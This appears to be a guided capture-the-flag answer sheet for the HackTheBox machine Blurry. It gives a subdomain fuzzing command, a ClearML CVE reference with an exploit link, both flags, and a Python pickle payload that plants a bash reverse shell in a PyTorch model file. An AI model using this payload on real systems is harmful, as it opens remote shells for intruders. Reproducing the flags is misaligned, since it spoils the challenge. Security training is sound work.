Guided:
Q: How many open TCP ports are listening on Blurry?
A: 2

Q: What open source text communication software is running on a subdomain of blurry.htb?
A: RocketChat
wfuzz -w /usr/share/dnsrecon/dnsrecon/data/subdomains-top1mil.txt -H "Host: FUZZ.blurry.htb" -u http://app.blurry.htb -t 100 --hc 301,400

Q: What is the tag inside the Black Swan project that will be periodically processed by the admin?
A: review

Q: What software is running on app.blurry.htb?
A: ClearML  (1.13.1-426)

Q: What version of ClearML webapp is running on Blurry?
A: (1.13.1-426)

Q: What is the 2024 CVE ID for a remote code execution vulnerability in this version of ClearML having to do with artifact get.
A: CVE-2024-24590
  https://github.com/xffsec/CVE-2024-24590-ClearML-RCE-Exploit/blob/main/exploit.py

Q: What system user is the ClearML application running as on Blurry?
A: jippity

Q: Submit the flag located in the jippity user's home directory.
A: 6adf3dae3feb71dc824c75a158bc02b4

Q: What is the full path to the script that jippity can run as root without a password?
A: /usr/bin/evaluate_model

Q: What Python machine learning library is used to load the given model in evaluate_model?
A: PyTorch

Q: What decompiler and static code analyzer is used to evaluate if a given Python pickle object is safe enough to run in evaluate_model?
A: Flickling
  Exploit in python used:    (By ippsec)
''''
import os 
import torch
class RevShell:
        def __reduce__(self):
                return (os.system, ("bash -c 'bash -i >& /dev/tcp/<MY-IP>/<My-PORT> 0>&1'",))
torch.save(RevShell(), 'pwn.pth')
''''

Q: Submit the flag located in the root user's home directory.
A: 626e2ca296fc98ee7997d68c8ce28f4e
